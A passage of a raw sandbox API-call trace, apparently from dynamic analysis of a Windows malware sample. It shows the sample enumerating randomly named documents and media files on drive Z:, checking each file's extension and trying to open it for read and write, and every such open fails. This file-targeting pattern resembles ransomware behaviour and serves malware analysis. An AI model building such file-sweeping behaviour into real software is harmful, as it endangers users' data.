dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0182.930] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ec4bb, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xae3d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Yxa8HDFZVHjsem9K2t.pptx", cAlternateFileName="")) returned 1 [0182.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0182.930] PathFindExtensionW (pszPath="Z:\\Yxa8HDFZVHjsem9K2t.pptx") returned=".pptx" [0182.934] CreateFileW (lpFileName="Z:\\Yxa8HDFZVHjsem9K2t.pptx" (normalized: "z:\\yxa8hdfzvhjsem9k2t.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0182.936] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb5c9f2, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26563936, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb5c9f2, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xedc3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9RqmGLGyrOcA3.mp3", cAlternateFileName="")) returned 1 [0182.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0182.936] PathFindExtensionW (pszPath="Z:\\9RqmGLGyrOcA3.mp3") returned=".mp3" [0182.939] CreateFileW (lpFileName="Z:\\9RqmGLGyrOcA3.mp3" (normalized: "z:\\9rqmglgyroca3.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.941] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0182.941] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbc80c4, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266af9c2, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbc80c4, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xd7fe, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pC3tGDvF.doc", cAlternateFileName="")) returned 1 [0182.941] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0182.941] PathFindExtensionW (pszPath="Z:\\pC3tGDvF.doc") returned=".doc" [0182.946] CreateFileW (lpFileName="Z:\\pC3tGDvF.doc" (normalized: "z:\\pc3tgdvf.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.947] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0182.947] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ec4bb, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x9668, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Yn0PYQpVz8.doc", cAlternateFileName="")) returned 1 [0182.947] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0182.947] PathFindExtensionW (pszPath="Z:\\Yn0PYQpVz8.doc") returned=".doc" [0182.951] CreateFileW (lpFileName="Z:\\Yn0PYQpVz8.doc" (normalized: "z:\\yn0pyqpvz8.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.952] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0182.952] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbc80c4, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266b9602, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbc80c4, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x153ad, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qkovu43RZ2n.odt", cAlternateFileName="")) returned 1 [0182.952] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0182.952] PathFindExtensionW (pszPath="Z:\\qkovu43RZ2n.odt") returned=".odt" [0182.956] CreateFileW (lpFileName="Z:\\qkovu43RZ2n.odt" (normalized: "z:\\qkovu43rz2n.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.958] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0182.958] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb66634, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26580df7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb66634, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x1663f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EjMAFky9mSGD.mp4", cAlternateFileName="")) returned 1 [0182.958] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0182.958] PathFindExtensionW (pszPath="Z:\\EjMAFky9mSGD.mp4") returned=".mp4" [0182.962] CreateFileW (lpFileName="Z:\\EjMAFky9mSGD.mp4" (normalized: "z:\\ejmafky9msgd.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.965] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0182.965] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbaabff, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266888c0, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbaabff, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x8daf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dSLdNV.doc", cAlternateFileName="")) returned 1 [0182.965] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0182.965] PathFindExtensionW (pszPath="Z:\\dSLdNV.doc") returned=".doc" [0182.969] CreateFileW (lpFileName="Z:\\dSLdNV.doc" (normalized: "z:\\dsldnv.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.970] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0182.970] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265e287a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x7249, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VWgLcoYpNW87TI6XH.ods", cAlternateFileName="")) returned 1 [0182.970] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0182.971] PathFindExtensionW (pszPath="Z:\\VWgLcoYpNW87TI6XH.ods") returned=".ods" [0182.975] CreateFileW (lpFileName="Z:\\VWgLcoYpNW87TI6XH.ods" (normalized: "z:\\vwglcoypnw87ti6xh.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.976] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0182.976] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbc80c4, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266b9602, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbc80c4, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x17618, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qw5s04.swf", cAlternateFileName="")) returned 1 [0182.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0182.976] PathFindExtensionW (pszPath="Z:\\qw5s04.swf") returned=".swf" [0182.980] CreateFileW (lpFileName="Z:\\qw5s04.swf" (normalized: "z:\\qw5s04.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.981] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0182.981] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbdb947, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266cce83, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbdb947, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xa055, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vfO9r7XUdR7Mn9SuaJu.flv", cAlternateFileName="")) returned 1 [0182.981] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0182.982] PathFindExtensionW (pszPath="Z:\\vfO9r7XUdR7Mn9SuaJu.flv") returned=".flv" [0182.985] CreateFileW (lpFileName="Z:\\vfO9r7XUdR7Mn9SuaJu.flv" (normalized: "z:\\vfo9r7xudr7mn9suaju.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.987] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0182.987] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbdb947, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266cce83, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbdb947, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xf66c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yvd6SxFNPFFdWKTf.bmp", cAlternateFileName="")) returned 1 [0182.987] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0182.987] PathFindExtensionW (pszPath="Z:\\yvd6SxFNPFFdWKTf.bmp") returned=".bmp" [0182.990] CreateFileW (lpFileName="Z:\\yvd6SxFNPFFdWKTf.bmp" (normalized: "z:\\yvd6sxfnpffdwktf.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0182.992] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb70276, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2658aa37, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb70276, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x11028, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Hs8SJlE.pdf", cAlternateFileName="")) returned 1 [0182.992] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0182.992] PathFindExtensionW (pszPath="Z:\\Hs8SJlE.pdf") returned=".pdf" [0182.995] CreateFileW (lpFileName="Z:\\Hs8SJlE.pdf" (normalized: "z:\\hs8sjle.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.997] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0182.997] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbbe482, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266a5d81, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbbe482, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x11e0a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="k8F1wk5HusiiaH6.pdf", cAlternateFileName="")) returned 1 [0182.997] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0182.997] PathFindExtensionW (pszPath="Z:\\k8F1wk5HusiiaH6.pdf") returned=".pdf" [0183.001] CreateFileW (lpFileName="Z:\\k8F1wk5HusiiaH6.pdf" (normalized: "z:\\k8f1wk5husiiah6.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.002] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0183.002] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbc80c4, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266b9602, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbc80c4, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x5123, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="r4V67Cxk5wf.pptx", cAlternateFileName="")) returned 1 [0183.002] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0183.002] PathFindExtensionW (pszPath="Z:\\r4V67Cxk5wf.pptx") returned=".pptx" [0183.006] CreateFileW (lpFileName="Z:\\r4V67Cxk5wf.pptx" (normalized: "z:\\r4v67cxk5wf.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.007] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0183.007] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbbe482, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266a5d81, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbbe482, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x6ed2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ljwMlJaUR.gif", cAlternateFileName="")) returned 1 [0183.007] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0183.007] PathFindExtensionW (pszPath="Z:\\ljwMlJaUR.gif") returned=".gif" [0183.014] CreateFileW (lpFileName="Z:\\ljwMlJaUR.gif" (normalized: "z:\\ljwmljaur.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.016] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0183.016] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb70276, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2658aa37, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb70276, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xa862, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="I235155.jpg", cAlternateFileName="")) returned 1 [0183.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0183.016] PathFindExtensionW (pszPath="Z:\\I235155.jpg") returned=".jpg" [0183.022] CreateFileW (lpFileName="Z:\\I235155.jpg" (normalized: "z:\\i235155.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.023] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0183.023] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbbe482, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266a5d81, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbbe482, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x178d7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jZ8QQ.png", cAlternateFileName="")) returned 1 [0183.023] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0183.023] PathFindExtensionW (pszPath="Z:\\jZ8QQ.png") returned=".png" [0183.028] CreateFileW (lpFileName="Z:\\jZ8QQ.png" (normalized: "z:\\jz8qq.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.029] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0183.029] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbb4840, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2669c141, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbb4840, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xcbff, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hHQWi5hCV.pdf", cAlternateFileName="")) returned 1 [0183.029] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0183.029] PathFindExtensionW (pszPath="Z:\\hHQWi5hCV.pdf") returned=".pdf" [0183.034] CreateFileW (lpFileName="Z:\\hHQWi5hCV.pdf" (normalized: "z:\\hhqwi5hcv.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.036] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0183.036] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbb4840, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266a5d81, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbb4840, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xdd63, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jBgQDjljdAi8Iv2PL.gif", cAlternateFileName="")) returned 1 [0183.036] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0183.036] PathFindExtensionW (pszPath="Z:\\jBgQDjljdAi8Iv2PL.gif") returned=".gif" [0183.041] CreateFileW (lpFileName="Z:\\jBgQDjljdAi8Iv2PL.gif" (normalized: "z:\\jbgqdjljdai8iv2pl.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.042] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0183.042] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb70276, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26580df7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb70276, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x17642, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HcsLtIJlEmM0NTPGs.xls", cAlternateFileName="")) returned 1 [0183.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0183.042] PathFindExtensionW (pszPath="Z:\\HcsLtIJlEmM0NTPGs.xls") returned=".xls" [0183.047] CreateFileW (lpFileName="Z:\\HcsLtIJlEmM0NTPGs.xls" (normalized: "z:\\hcsltijlemm0ntpgs.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.048] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0183.048] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb8d73a, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ceffa, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb8d73a, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xb087, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="QfHsttYoiqOGUUjwI5r.swf", cAlternateFileName="")) returned 1 [0183.048] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0183.048] PathFindExtensionW (pszPath="Z:\\QfHsttYoiqOGUUjwI5r.swf") returned=".swf" [0183.052] CreateFileW (lpFileName="Z:\\QfHsttYoiqOGUUjwI5r.swf" (normalized: "z:\\qfhsttyoiqoguujwi5r.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.053] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0183.053] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb5c9f2, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26563936, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb5c9f2, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x607c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8me2d.pptx", cAlternateFileName="")) returned 1 [0183.053] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0183.053] PathFindExtensionW (pszPath="Z:\\8me2d.pptx") returned=".pptx" [0183.057] CreateFileW (lpFileName="Z:\\8me2d.pptx" (normalized: "z:\\8me2d.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.058] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0183.059] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, 